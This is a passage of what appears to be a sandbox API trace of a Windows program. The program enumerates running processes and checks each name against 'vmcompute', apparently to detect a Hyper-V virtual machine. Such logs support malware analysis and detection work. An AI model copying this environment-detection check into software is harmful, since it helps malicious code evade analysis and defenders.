th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.939] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35700e0 [0101.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35700e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.939] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.940] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.940] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.941] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ff30 [0101.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ff30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.941] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.941] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.942] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.943] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570188 [0101.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.943] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.943] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.945] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35700b0 [0101.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35700b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.945] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.945] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.945] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.946] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ff48 [0101.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ff48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.947] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.947] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.947] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.949] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ffd8 [0101.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ffd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.949] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.949] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.951] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570080 [0101.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3570080, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0101.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0101.951] StrStrIA (lpFirst="spoolsv.exe", lpSrch="vmcompute") returned 0x0 [0101.951] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.953] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ff78 [0101.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ff78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.953] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.953] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.954] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ff60 [0101.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356ff60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0101.954] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0101.954] StrStrIA (lpFirst="audiodg.exe", lpSrch="vmcompute") returned 0x0 [0101.955] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0101.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.956] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570128 [0101.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3570128, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0101.956] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0101.956] StrStrIA (lpFirst="sihost.exe", lpSrch="vmcompute") returned 0x0 [0101.956] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.958] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35700f8 [0101.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35700f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.958] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.958] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.958] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.959] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570038 [0101.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3570038, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.960] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.960] StrStrIA (lpFirst="taskhostw.exe", lpSrch="vmcompute") returned 0x0 [0101.960] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.961] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ff90 [0101.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356ff90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0101.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0101.961] StrStrIA (lpFirst="explorer.exe", lpSrch="vmcompute") returned 0x0 [0101.961] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0101.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.980] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f240 [0101.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357f240, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0101.981] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0101.981] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="vmcompute") returned 0x0 [0101.981] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0101.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.982] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e550 [0101.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x357e550, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0101.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0101.982] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="vmcompute") returned 0x0 [0101.982] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0101.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.984] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f3c0 [0101.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357f3c0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0101.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0101.984] StrStrIA (lpFirst="Memory Compression", lpSrch="vmcompute") returned 0x0 [0101.984] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0101.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.985] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357f260 [0101.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357f260, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0101.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0101.986] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="vmcompute") returned 0x0 [0101.986] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0101.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.987] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570098 [0101.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3570098, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0101.987] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0101.987] StrStrIA (lpFirst="SearchUI.exe", lpSrch="vmcompute") returned 0x0 [0101.987] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0101.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.988] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f3e0 [0101.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357f3e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0101.989] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0101.989] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="vmcompute") returned 0x0 [0101.989] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.990] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ffa8 [0101.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356ffa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0101.990] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0101.990] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="vmcompute") returned 0x0 [0101.990] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0101.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.991] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ffc0 [0101.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356ffc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0101.991] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0101.991] StrStrIA (lpFirst="pending.exe", lpSrch="vmcompute") returned 0x0 [0101.991] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0101.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.993] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e618 [0101.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x357e618, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0101.993] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0101.993] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="vmcompute") returned 0x0 [0101.993] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0102.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.008] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f2a0 [0102.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357f2a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0102.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0102.009] StrStrIA 